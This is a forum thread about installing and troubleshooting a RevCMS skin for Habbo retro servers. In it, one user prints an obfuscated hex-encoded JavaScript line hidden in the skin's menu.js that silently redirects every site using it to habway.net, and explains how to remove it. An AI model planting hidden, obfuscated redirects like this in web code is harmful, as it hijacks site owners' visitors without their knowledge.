Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

[Revcms] Project habbo v1.2 [Minimail] [Modern]

Status
Not open for further replies.
Elite Diviner
Reaction score
It does have something to do with the theme LOL.....

It works on the regular habbo edit, just this themes login it says "user doesn't exist" when the user is clearly registered in the database.

Its a xammp thing i believe. Works perfect with IIS

Banned
Banned
Reaction score
It's a really good release, but personally, I don't really like it but still thanks!

Newbie Spellweaver
Reaction score
Client stays black, tried another cms and the client works. So is there something wrong with the client.php? ..

---

Already fixed it. Changed theme names in links in the client.php

<script src="app/tpl/skins/Habbo/client/libs2.js" type="text/javascript"></script>
<script src="app/tpl/skins/Habbo/client/visual.js" type="text/javascript"></script>
<script src="app/tpl/skins/Habbo/client/libs.js" type="text/javascript"></script>
<script src="app/tpl/skins/Habbo/client/common.js" type="text/javascript"></script>

Habbo was Trito

Initiate Mage
Reaction score
I have download the cms and i've host it, but redirect me in habcrazy.com why ?????

Newbie Spellweaver
Reaction score
I have download the cms and i've host it, but redirect me in habcrazy.com why ?????

Delete 'menu.js' in the 'js' folder, that solved the problem for me.

Where is the config?

You need to download RevCMS first, after that you need to put this in the skins folder. (app/tpl/skins/)
And after that you need to fill in RevCMS's config. (/app/management/config.php)

Newbie Spellweaver
Reaction score
Hi there.
I was searching around for some hotels who got this cms and i found
They got some realy nice edit i think, and my question is: Can someone make this?

Attachments

You must be registered for see attachments list
Elite Diviner
Reaction score
how i can install this cms? where is the config?

Simply put it in your skin folder for RevCMS. No config is required for the skin itself, however you will need to edit a config file in app/management to get revcms working

Newbie Spellweaver
Reaction score
Great job, in my opinion this is one of the best RevCMS skins available at the moment.

Only complaint I could think of, was the styling completely missing on browsers such as Firefox

Last edited:
Newbie Spellweaver
Reaction score
Leon Retros - [Revcms] Project habbo v1.2 [Minimail] [Modern] - RaGEZONE Forums

Deleted Menu.js because i connected every time to habway.net
How to fix it?

Junior Spellweaver
Reaction score
No, unfortunately I could not find the URL in the file.

In the menu.js File it exists a line like this:

var _0x6b14=["\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x61\x62\x77\x61\x79\x2E\x6E\x65\x74","\x68\x72\x65\x66","\x74\x6F\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x68\x61\x62\x77\x61\x79\x2E\x6E\x65\x74"];if(window[_0x6b14[1]][_0x6b14[0]]!==_0x6b14[2]){window[_0x6b14[4]][_0x6b14[1]][_0x6b14[3]]=_0x6b14[5];} ;

U need to delete this line and it should work without delete this file.

Newbie Spellweaver
Reaction score
face where I set it with the database? Is giving error when I go ... OBD / localhost YES: Passoword: NO

And is not the CSS on the page ...

Newbie Spellweaver
Reaction score
link to download the cms this is the theme only but I want the cms

Junior Spellweaver
Reaction score
Anyone have this theme without any php poop added to it? I just want the theme itself...

Status
Not open for further replies.
Back